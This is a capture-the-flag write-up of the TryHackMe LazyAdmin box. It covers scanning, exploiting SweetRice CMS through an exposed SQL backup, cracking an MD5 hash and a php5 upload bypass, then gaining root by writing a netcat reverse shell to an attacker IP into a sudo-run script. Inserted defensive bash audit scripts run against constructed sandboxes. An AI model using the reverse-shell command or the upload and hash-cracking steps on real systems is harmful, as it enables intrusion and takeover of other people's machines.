TryHackMe - LazyAdmin

Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.1.0    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-28 15:50 EDT
Nmap scan report for 10.10.1.0
Host is up (0.24s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=6/28%OT=22%CT=1%CU=37647%PV=Y%DS=4%DC=I%G=Y%TM=62BB608
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)SEQ(SP=1
OS:04%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M506ST11NW7%O2=M506ST11NW7%O
OS:3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11NW7%O6=M506ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1305.33 seconds                                                         

Port 80


Directory busting

  • With gobuster we find a directory named content

  • It is worth launching gobuster inside content as well; we find other things there too

  • And we have a login portal at http://10.10.1.0/content/as/

  • We could search for the admin user and try to use this exploit

  • We find this interesting exploit by googling SweetRice CMS

  • We indeed find an SQL file here: http://10.10.1.0/content/inc/mysql_backup/

  • We can also see a list of files, as directory listing is enabled: http://10.10.1.0/content/inc/

  • Searching Google, we find in the exploits a reference to the plugin directory http://10.10.1.0/content/_plugin/

The MySQL file

  • The MySQL backup file contains an MD5-hashed password.

  • With a look on CrackStation we can get it in cleartext.

  • We can try to log in using the username and password found in this file. It works.

  • If we go to the media page there is a file upload vulnerability. According to the code of this exploit, if we change our file extension to php5 it will get uploaded.

  • It works: our file is uploaded and then we get our shell.

  • If we ls /home we have an itguy directory.

  • We can even freely enter this user's directory, as we have enough permissions.

  • Let's grab the user flag.

  • Let's stabilize our shell: python3 -c 'import pty; pty.spawn("/bin/bash")'

  • In the home folder we have a file called mysql_login.txt with a password in it. We can connect to MySQL with the password provided: mysql -u rice -p
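The three web-side weaknesses used so far (a database dump sitting under the document root, directory listing enabled, and an upload filter that lets a .php5 file through) are all things the box's owner could have swept for from the server itself. The script below is an added example and is not part of the original write-up or of SweetRice: it builds a throwaway sandbox (the dump content, the MD5 of the string "password", the file names site.sql and upload.php5, the attachment directory name and the two Apache snippets are all constructed) and runs three checks against it.

```bash
#!/bin/bash
# Added audit script (not part of the write-up or of SweetRice): three checks
# for the web-tier weaknesses the walkthrough relies on. Everything created by
# make_sandbox() is constructed sample data.

set -u

# 1. Database dumps under the document root are downloadable by anyone who
#    lists or guesses the path. Print "file count", where count is the number
#    of lines holding a quoted 32-hex token, the shape of an unsalted MD5 hash
#    (which falls to lookup tables such as CrackStation).
audit_dumps() {
    find "$1" -type f \( -name '*.sql' -o -name '*.bak' \) | sort |
    while IFS= read -r f; do
        n=$(grep -Ec "'[0-9a-f]{32}'" "$f" || true)   # grep -c prints 0 on no match
        printf '%s %s\n' "$f" "$n"
    done
}

# 2. Directory listing: an Options line carrying Indexes (but not -Indexes)
#    exposes every file name in that directory, which is how the backup and
#    plugin directories were found.
indexes_enabled() {
    if grep -Ei '^[[:space:]]*Options([[:space:]].*)?[[:space:]+]Indexes' "$1" >/dev/null; then
        echo yes
    else
        echo no
    fi
}

# 3. Upload sweep: list files in the media/attachment directory whose final
#    extension is not an image type. A denylist that only knows ".php" misses
#    php5/phtml; an allowlist on the last extension does not.
sweep_uploads() {
    find "$1" -type f | sort |
    while IFS= read -r f; do
        ext=$(printf '%s' "${f##*.}" | tr 'A-Z' 'a-z')
        case "$ext" in
            jpg|jpeg|png|gif|webp) ;;          # allowed image types
            *) printf '%s\n' "$f" ;;           # anything else is reported
        esac
    done
}

# Build the constructed sandbox and print its path.
make_sandbox() {
    sb=$(mktemp -d)
    mkdir -p "$sb/www/content/inc/mysql_backup" "$sb/www/content/attachment"
    # constructed dump: one row with an unsalted MD5 (of "password"), one without
    cat > "$sb/www/content/inc/mysql_backup/site.sql" <<'EOF'
INSERT INTO options VALUES ('admin','5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO options VALUES ('site_name','lazyadmin');
EOF
    : > "$sb/www/content/attachment/logo.png"
    : > "$sb/www/content/attachment/upload.php5"
    printf '<Directory /var/www/html>\n    Options Indexes FollowSymLinks\n</Directory>\n' > "$sb/weak.conf"
    printf '<Directory /var/www/html>\n    Options -Indexes +FollowSymLinks\n</Directory>\n' > "$sb/fixed.conf"
    printf '%s\n' "$sb"
}

# Usage: bash audit_web.sh --demo
if [ "${1:-}" = "--demo" ]; then
    sb=$(make_sandbox)
    audit_dumps "$sb/www"
    indexes_enabled "$sb/weak.conf"
    indexes_enabled "$sb/fixed.conf"
    sweep_uploads "$sb/www/content/attachment"
    rm -rf "$sb"
fi
```

On a real host the same functions are pointed at /var/www and the site's Apache configuration; a non-zero hash count in audit_dumps means the stored credentials should be treated as compromised and re-hashed with a salted, slow algorithm, and any hit from sweep_uploads is a file that should never have been accepted.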

Privilege Escalation

  • Here is what we get if we run sudo -l

  • Here is the content of backup.pl

  • Here is the content of /etc/copy.sh; it looks like a reverse shell

  • Let's replace it with the same thing but with my Kali IP instead: echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.22.56 5554 >/tmp/f" > /etc/copy.sh

  • Our change is successful

  • Let's set our listener on port 5554: rlwrap nc -lvnp 5554

  • And now let's launch the Perl script we are allowed to run: sudo /usr/bin/perl /home/itguy/backup.pl

  • We get a root shell without having to do any lateral movement!

  • Let's grab our root flag.
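The chain above (a sudo rule that runs backup.pl as root, which in turn executes a world-writable /etc/copy.sh) is exactly the pattern a permissions audit should catch before anyone else does. The script below is an added example and not part of the original write-up: it reads sudo -l style rule lines for scripts run as root, then lists every file each script references that a group or other user could write to. The sandbox it builds, the paths in it and the rule line are constructed; the rule line only follows the shape sudo -l prints, and sudo itself is never invoked.

```bash
#!/bin/bash
# Added audit script (not part of the write-up): find the weak link behind a
# sudo rule. The sandbox from make_sandbox() is constructed sample data.

set -u

# Script paths from rule lines of the form "(ALL) NOPASSWD: /interp /path":
# the last field of each line that opens with "(" and starts with "/".
sudo_rule_scripts() {
    grep -E '^[[:space:]]*\(' "$1" | awk '{print $NF}' | grep '^/' || true
}

# Absolute paths mentioned anywhere in a script's text, plus the script itself.
referenced_paths() {
    {
        printf '%s\n' "$1"
        grep -Eo '(^|[^A-Za-z0-9_./-])/[A-Za-z0-9_./-]+' "$1" | sed 's#^[^/]*##'
    } | sort -u
}

# Print "path perms" for each referenced path that exists and is writable by
# group or other (symlinks are resolved first). Anything listed can be edited
# by a low-privileged user and then runs as root when the sudo rule fires.
weak_links() {
    referenced_paths "$1" | while IFS= read -r p; do
        [ -e "$p" ] || continue
        perms=$(ls -ldL "$p" | cut -c1-10)
        case "$perms" in
            ?????w*|????????w*) printf '%s %s\n' "$p" "$perms" ;;   # g+w or o+w
        esac
    done
}

# Build the constructed sandbox and print its path.
make_sandbox() {
    sb=$(mktemp -d)
    mkdir -p "$sb/etc" "$sb/home/itguy"
    # world-writable helper, the same weakness as copy.sh on the box
    printf '#!/bin/sh\ntar czf /tmp/backup.tgz /var/www\n' > "$sb/etc/copy.sh"
    chmod 777 "$sb/etc/copy.sh"
    # a correctly permissioned helper for contrast
    printf '#!/bin/sh\necho ok\n' > "$sb/etc/safe.sh"
    chmod 755 "$sb/etc/safe.sh"
    cat > "$sb/home/itguy/backup.pl" <<EOF
#!/usr/bin/perl
system("sh", "$sb/etc/copy.sh");
system("sh", "$sb/etc/safe.sh");
EOF
    chmod 644 "$sb/home/itguy/backup.pl"
    # constructed rule line in the shape sudo -l prints
    printf '(ALL) NOPASSWD: /usr/bin/perl %s/home/itguy/backup.pl\n' "$sb" > "$sb/sudo-l.txt"
    printf '%s\n' "$sb"
}

# Usage: bash audit_sudo.sh --demo
if [ "${1:-}" = "--demo" ]; then
    sb=$(make_sandbox)
    for s in $(sudo_rule_scripts "$sb/sudo-l.txt"); do
        weak_links "$s"
    done
    rm -rf "$sb"
fi
```

Against a live system, feed the saved output of sudo -l to sudo_rule_scripts and run weak_links on each result; every line it prints is a file to chmod back to 755 and chown to root, and the fix for this box is exactly that on /etc/copy.sh.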
